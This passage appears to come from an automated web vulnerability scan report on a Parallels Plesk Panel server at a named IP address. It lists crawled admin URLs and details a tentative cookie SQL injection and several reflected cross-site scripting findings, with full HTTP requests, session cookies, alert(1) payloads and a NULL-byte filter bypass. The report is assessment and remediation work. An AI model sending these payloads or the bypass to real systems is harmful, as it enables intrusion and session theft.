14.23. https://50.22.21.242:8443/admin/home/click-promo/

14.24. https://50.22.21.242:8443/admin/home/click-promo/id/

14.25. https://50.22.21.242:8443/admin/home/click-promo/id/promo_click_mobile

14.26. https://50.22.21.242:8443/admin/index.php/

14.27. https://50.22.21.242:8443/admin/index.php/home

14.28. https://50.22.21.242:8443/admin/index.php/reseller/

14.29. https://50.22.21.242:8443/admin/index.php/reseller/login-info/

14.30. https://50.22.21.242:8443/admin/index.php/reseller/personal-info/

14.31. https://50.22.21.242:8443/admin/index.php/reseller/tools/

14.32. https://50.22.21.242:8443/admin/index.php/reseller/tools/id/

14.33. https://50.22.21.242:8443/admin/index.php/reseller/tools/id/1/

14.34. https://50.22.21.242:8443/admin/index.php/subscription/

14.35. https://50.22.21.242:8443/admin/index.php/subscription/list

14.36. https://50.22.21.242:8443/admin/promotion/

14.37. https://50.22.21.242:8443/admin/promotion/mobile-monitor/

14.38. https://50.22.21.242:8443/admin/reseller/

14.39. https://50.22.21.242:8443/admin/reseller/create

14.40. https://50.22.21.242:8443/admin/reseller/list

14.41. https://50.22.21.242:8443/admin/reseller/list/

14.42. https://50.22.21.242:8443/admin/reseller/list/reset-search/true/

14.43. https://50.22.21.242:8443/admin/reseller/login-info/

14.44. https://50.22.21.242:8443/admin/reseller/personal-info/

14.45. https://50.22.21.242:8443/admin/reseller/tools/

14.46. https://50.22.21.242:8443/admin/reseller/tools/id/

14.47. https://50.22.21.242:8443/admin/reseller/tools/id/1/

14.48. https://50.22.21.242:8443/admin/server/

14.49. https://50.22.21.242:8443/admin/server/admin-plan

14.50. https://50.22.21.242:8443/admin/server/tools

14.51. https://50.22.21.242:8443/admin/subscription/

14.52. https://50.22.21.242:8443/admin/subscription/create

14.53. https://50.22.21.242:8443/admin/subscription/list

14.54. https://50.22.21.242:8443/admin/subscription/list/reset-search/true/

14.55. https://50.22.21.242:8443/admin/subscription/login

14.56. https://50.22.21.242:8443/admin/subscription/login/

14.57. https://50.22.21.242:8443/admin/subscription/login/id/

14.58. https://50.22.21.242:8443/admin/subscription/login/id/1/

14.59. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/

14.60. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app%2Favailable%2Fid%2Fapscatalog%3FdetailsAppName%3DosTicket

14.61. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/

14.62. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/

14.63. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/id/

14.64. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/id/apscatalog

14.65. https://50.22.21.242:8443/admin/subscription/login/id/2/

14.66. https://50.22.21.242:8443/admin/update/

14.67. https://50.22.21.242:8443/admin/update/settings

14.68. https://50.22.21.242:8443/admin/update/settings/

14.69. https://50.22.21.242:8443/admin/update/settings/e647e%22a%3d%22b%22c3c736922d6

14.70. https://50.22.21.242:8443/admin/update/settings/e647e%22a%3d%22b%22c3c736922d649560ed53f10167ff175bf77

14.71. https://50.22.21.242:8443/admin/webmail/

14.72. https://50.22.21.242:8443/admin/webmail/enable

14.73. https://50.22.21.242:8443/admin/webmail/list-data

14.74. https://50.22.21.242:8443/filemanager/getimg.php

14.75. https://50.22.21.242:8443/javascript/chk.js.php

14.76. https://50.22.21.242:8443/plesk/

14.77. https://50.22.21.242:8443/plesk/actionlog/

14.78. https://50.22.21.242:8443/plesk/admin-info/

14.79. https://50.22.21.242:8443/plesk/admin/report/

14.80. https://50.22.21.242:8443/plesk/admin/report/traffic-history/

14.81. https://50.22.21.242:8443/plesk/client@/domain@1/backup/local-repository/

14.82. https://50.22.21.242:8443/plesk/client@1/

14.83. https://50.22.21.242:8443/plesk/client@1/domain@/

14.84. https://50.22.21.242:8443/plesk/client@1/domain@1/

14.85. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/create/

14.86. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/ftp-repository/

14.87. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/

14.88. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/restore/

14.89. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/restore/

14.90. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/restore/

14.91. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/restore/

14.92. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/restore/

14.93. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/restore/

14.94. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/restore/

14.95. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/restore/

14.96. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/restore/

14.97. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/upload/

14.98. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/schedule/

14.99. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/task@/

14.100. https://50.22.21.242:8443/plesk/client@1/domain@1/dns/

14.101. https://50.22.21.242:8443/plesk/client@1/domain@1/traffic-hosting

14.102. https://50.22.21.242:8443/plesk/client@1/shared-ssl/

14.103. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/

14.104. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/

14.105. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/create-dir/

14.106. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/edit/

14.107. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/permissions/

14.108. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/rename/

14.109. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/view/

14.110. https://50.22.21.242:8443/plesk/cp-access/

14.111. https://50.22.21.242:8443/plesk/ftp-sessions/

14.112. https://50.22.21.242:8443/plesk/icons/

14.113. https://50.22.21.242:8443/plesk/logo/

14.114. https://50.22.21.242:8443/plesk/notification@/

14.115. https://50.22.21.242:8443/plesk/server/firewall/

14.116. https://50.22.21.242:8443/plesk/server/preferences/

14.117. https://50.22.21.242:8443/plesk/server/statistics/

14.118. https://50.22.21.242:8443/plesk/server/tsclient/

14.119. https://50.22.21.242:8443/plesk/sessions/

14.120. https://50.22.21.242:8443/plesk/sessions/properties/

14.121. https://50.22.21.242:8443/plesk/start-page/

14.122. https://50.22.21.242:8443/plesk/ts-sessions/

14.123. https://50.22.21.242:8443/relay

14.124. https://50.22.21.242:8443/server/cp_access_add_edit.php

14.125. https://50.22.21.242:8443/server/cp_access_remove.php

14.126. https://50.22.21.242:8443/server/firewall.php

14.127. https://50.22.21.242:8443/server/firewall_icmp.php

14.128. https://50.22.21.242:8443/server/firewall_interface.php

14.129. https://50.22.21.242:8443/server/firewall_rule_edit.php

14.130. https://50.22.21.242:8443/sessions/tssessions_disconnect.php

14.131. https://50.22.21.242:8443/sessions/tssessions_info.php

14.132. https://50.22.21.242:8443/sessions/tssessions_logoff.php

14.133. https://50.22.21.242:8443/smb/

14.134. https://50.22.21.242:8443/smb/account

14.135. https://50.22.21.242:8443/smb/account/

14.136. https://50.22.21.242:8443/smb/account/backup-subscription/id/1

14.137. https://50.22.21.242:8443/smb/account/show/id/1

14.138. https://50.22.21.242:8443/smb/account/switch/

14.139. https://50.22.21.242:8443/smb/account/switch/id/

14.140. https://50.22.21.242:8443/smb/account/switch/id/1

14.141. https://50.22.21.242:8443/smb/admin-home

14.142. https://50.22.21.242:8443/smb/admin-home/

14.143. https://50.22.21.242:8443/smb/admin-home/installed-applications/

14.144. https://50.22.21.242:8443/smb/app-image/gallery/

14.145. https://50.22.21.242:8443/smb/app-image/gallery/catalogId/

14.146. https://50.22.21.242:8443/smb/app-image/gallery/catalogId/apscatalog/

14.147. https://50.22.21.242:8443/smb/app-image/gallery/catalogId/apscatalog/type/

14.148. https://50.22.21.242:8443/smb/app-image/gallery/catalogId/apscatalog/type/screenshot/

14.149. https://50.22.21.242:8443/smb/app-image/gallery/catalogId/apscatalog/type/screenshot/resourcesUrl/

14.150. https://50.22.21.242:8443/smb/app-image/gallery/catalogId/apscatalog/type/screenshot/resourcesUrl/aHR0cDovL2NhdGFsb2cubWFya2V0cGxhY2UucGFyYWxsZWxzLmNvbS9hbGwtYXBwL2F1dG9pbmRleC5zb3VyY2Vmb3JnZS5uZXQvQXV0b0luZGV4LzIuMi40LTMvcmVzb3VyY2VzLz9wYWNrYWdlcj13d3cucGFyYWxsZWxzLmNvbQ==

14.151. https://50.22.21.242:8443/smb/app/

14.152. https://50.22.21.242:8443/smb/app/available/

14.153. https://50.22.21.242:8443/smb/app/available/id/

14.154. https://50.22.21.242:8443/smb/app/available/id/apscatalog

14.155. https://50.22.21.242:8443/smb/app/categories-data/

14.156. https://50.22.21.242:8443/smb/app/categories-data/catalogId/

14.157. https://50.22.21.242:8443/smb/app/categories-data/catalogId/apscatalog

14.158. https://50.22.21.242:8443/smb/app/details-data/

14.159. https://50.22.21.242:8443/smb/app/details-data/catalogId/

14.160. https://50.22.21.242:8443/smb/app/details-data/catalogId/apscatalog

14.161. https://50.22.21.242:8443/smb/app/details-data/catalogId/marketplace

14.162. https://50.22.21.242:8443/smb/app/installed

14.163. https://50.22.21.242:8443/smb/app/installed/

14.164. https://50.22.21.242:8443/smb/app/market/

14.165. https://50.22.21.242:8443/smb/app/market/id/

14.166. https://50.22.21.242:8443/smb/app/market/id/marketplace

14.167. https://50.22.21.242:8443/smb/app/search-data/

14.168. https://50.22.21.242:8443/smb/app/search-data/catalogId/

14.169. https://50.22.21.242:8443/smb/app/search-data/catalogId/marketplace

14.170. https://50.22.21.242:8443/smb/database/

14.171. https://50.22.21.242:8443/smb/database/create-user/databaseId/1

14.172. https://50.22.21.242:8443/smb/database/edit-user/id/1/databaseId/1

14.173. https://50.22.21.242:8443/smb/database/edit-user/id/2/

14.174. https://50.22.21.242:8443/smb/database/edit-user/id/2/databaseId/

14.175. https://50.22.21.242:8443/smb/database/edit-user/id/2/databaseId/1

14.176. https://50.22.21.242:8443/smb/database/list

14.177. https://50.22.21.242:8443/smb/database/properties/id/1

14.178. https://50.22.21.242:8443/smb/email-address/

14.179. https://50.22.21.242:8443/smb/email-address/configuration/id/1

14.180. https://50.22.21.242:8443/smb/email-address/configuration/id/7

14.181. https://50.22.21.242:8443/smb/email-address/create

14.182. https://50.22.21.242:8443/smb/email-address/create/

14.183. https://50.22.21.242:8443/smb/email-address/edit/id/1

14.184. https://50.22.21.242:8443/smb/email-address/edit/id/3

14.185. https://50.22.21.242:8443/smb/email-address/list

14.186. https://50.22.21.242:8443/smb/email-address/list/

14.187. https://50.22.21.242:8443/smb/index.php/

14.188. https://50.22.21.242:8443/smb/index.php/service/

14.189. https://50.22.21.242:8443/smb/index.php/service/delete/

14.190. https://50.22.21.242:8443/smb/my-profile

14.191. https://50.22.21.242:8443/smb/redirect/pleskin/

14.192. https://50.22.21.242:8443/smb/redirect/pleskin/root/

14.193. https://50.22.21.242:8443/smb/redirect/pleskin/root/%2Fplesk%2Fclient%40%2Fdomain%401%2Fbackup%2F/root/%2Fplesk%2Fclient%40%2Fdomain%401%2Fdbbackup%2F/

14.194. https://50.22.21.242:8443/smb/redirect/pleskin/root//

14.195. https://50.22.21.242:8443/smb/service/

14.196. https://50.22.21.242:8443/smb/service/delete/

14.197. https://50.22.21.242:8443/smb/settings/tools

14.198. https://50.22.21.242:8443/smb/settings/tools-proxy

14.199. https://50.22.21.242:8443/smb/statistics

14.200. https://50.22.21.242:8443/smb/statistics/

14.201. https://50.22.21.242:8443/smb/user/create

14.202. https://50.22.21.242:8443/smb/user/list

14.203. https://50.22.21.242:8443/smb/user/overview/id/2

14.204. https://50.22.21.242:8443/smb/user/overview/id/3

14.205. https://50.22.21.242:8443/smb/web

14.206. https://50.22.21.242:8443/smb/web/change-hosting/

14.207. https://50.22.21.242:8443/smb/web/change-hosting/id/

14.208. https://50.22.21.242:8443/smb/web/change-hosting/id/1

14.209. https://50.22.21.242:8443/smb/web/change-status/

14.210. https://50.22.21.242:8443/smb/web/change-status/id/

14.211. https://50.22.21.242:8443/smb/web/settings/

14.212. https://50.22.21.242:8443/smb/web/settings/id/

14.213. https://50.22.21.242:8443/smb/web/settings/id/1

14.214. https://50.22.21.242:8443/smb/web/view

14.215. https://50.22.21.242:8443/smb/web/view/

14.216. https://50.22.21.242:8443/smb/web/view/id/

14.217. https://50.22.21.242:8443/smb/web/view/id/1/

14.218. https://50.22.21.242:8443/smb/web/view/type/

14.219. https://50.22.21.242:8443/smb/web/view/type/dns

14.220. https://50.22.21.242:8443/spaw/empty.html

14.221. https://50.22.21.242:8443/spaw/lib/themes/default/js/toolbar.js.php

14.222. https://50.22.21.242:8443/spaw/spaw.php

14.223. https://50.22.21.242:8443/spaw/spaw_script.js.php

14.224. https://50.22.21.242:8443/sso/api.php

14.225. https://50.22.21.242:8447/

14.226. https://50.22.21.242:8447/preferences.html

15. Content type incorrectly stated

15.1. https://50.22.21.242:8443/admin/health/parameters

15.2. https://50.22.21.242:8443/admin/update/settings/

15.3. https://50.22.21.242:8443/admin/webmail/enable

15.4. https://50.22.21.242:8443/admin/webmail/list-data

15.5. https://50.22.21.242:8443/javascript/chk.js.php

15.6. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/create-dir/

15.7. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/edit/

15.8. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/rename/

15.9. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/view/

15.10. https://50.22.21.242:8443/plesk/logo/

15.11. https://50.22.21.242:8443/smb/app-image/gallery/

15.12. https://50.22.21.242:8443/smb/app-image/gallery/catalogId/

15.13. https://50.22.21.242:8443/smb/app-image/gallery/catalogId/apscatalog/

15.14. https://50.22.21.242:8443/smb/app-image/gallery/catalogId/apscatalog/type/

15.15. https://50.22.21.242:8443/smb/app/categories-data/

15.16. https://50.22.21.242:8443/smb/app/categories-data/catalogId/

15.17. https://50.22.21.242:8443/smb/app/categories-data/catalogId/apscatalog

15.18. https://50.22.21.242:8443/smb/database/create-user/databaseId/1

15.19. https://50.22.21.242:8443/smb/database/edit-user/id/1/databaseId/1

15.20. https://50.22.21.242:8443/smb/email-address/configuration/id/1

15.21. https://50.22.21.242:8443/smb/email-address/configuration/id/7

15.22. https://50.22.21.242:8443/smb/email-address/create

15.23. https://50.22.21.242:8443/smb/settings/disable-promo/

15.24. https://50.22.21.242:8443/smb/settings/disable-promo/id/

15.25. https://50.22.21.242:8443/smb/settings/featured-applications

15.26. https://50.22.21.242:8443/spaw/spaw.php



1. SQL injection  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/notification@/

Issue detail

The certificateslist cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the certificateslist cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

POST /plesk/notification@/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/notification@/
Content-Type: multipart/form-data; boundary=--------277431300
Content-Length: 5345
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9'; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; psaContext=tools; PLESKSESSID=05f76d98be673cb6f1e57430536e3b51

----------277431300
Content-Disposition: form-data; name="domain_exp_warning_email"

wiener@example.com
----------277431300
Content-Disposition: form-data; name="previous_page"


----------277
...[SNIP]...

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Sun, 20 Nov 2011 06:46:02 GMT
Connection: close
Content-Length: 326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Service Unavailable</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=u
...[SNIP]...

Request 2

POST /plesk/notification@/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/notification@/
Content-Type: multipart/form-data; boundary=--------277431300
Content-Length: 5345
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9''; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; psaContext=tools; PLESKSESSID=05f76d98be673cb6f1e57430536e3b51

----------277431300
Content-Disposition: form-data; name="domain_exp_warning_email"

wiener@example.com
----------277431300
Content-Disposition: form-data; name="previous_page"


----------277
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 06:46:13 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 06:46:12 GMT
Connection: close
Content-Length: 1216


       <html><head>
       <meta charset="utf-8">
       <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
       <title></title>
       <script src="/javascript/common.js?plesk_version=psa-10.4.4-20111103.
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 23 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. https://50.22.21.242:8443/ [start_page parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /

Issue detail

The value of the start_page request parameter is copied into the value of a tag attribute which can contain JavaScript. The payload %00javascript%3aalert(1)//e2145da6 was submitted in the start_page parameter. This input was echoed as javascript:alert(1)//e2145da6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /?start_page=%00javascript%3aalert(1)//e2145da6 HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/account/power-mode-logout
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=credentials-info

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:40:48 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 1275

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Parallels Plesk Panel 10.4.4 for Microso
...[SNIP]...
<FRAME border="0" frameborder="0" framespacing="0" id="workFrame" name="workFrame" src=".javascript:alert(1)//e2145da6" marginheight="7" marginwidth="7" scrolling="auto" noresize>
...[SNIP]...

2.2. https://50.22.21.242:8443/admin/update/settings/ [branch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/update/settings/

Issue detail

The value of the branch request parameter is copied into the HTML document as plain text between tags. The payload 30b4b<img%20src%3da%20onerror%3dalert(1)>8c706b9f279 was submitted in the branch parameter. This input was echoed as 30b4b<img src=a onerror=alert(1)>8c706b9f279 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /admin/update/settings/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/admin/update/settings/
Content-Length: 144
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=xvrjftqfoptegfsokqpykqdf
Pragma: no-cache
Cache-Control: no-cache

branch=release30b4b<img%20src%3da%20onerror%3dalert(1)>8c706b9f279&automaticUpdates=0&automaticUpdates=1&automaticStableUpgrades=0&hidden=&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:07:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:07:33 GMT
Content-Length: 167

{"formMessages":{"branch":{"notInArray":"'release30b4b<img src=a onerror=alert(1)>8c706b9f279' was not found in the haystack"}},"status":"success","statusMessages":[]}

2.3. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/ [cmd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/

Issue detail

The value of the cmd request parameter is copied into the HTML document as plain text between tags. The payload abec1<script>alert(1)</script>cc1f852f1be was submitted in the cmd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

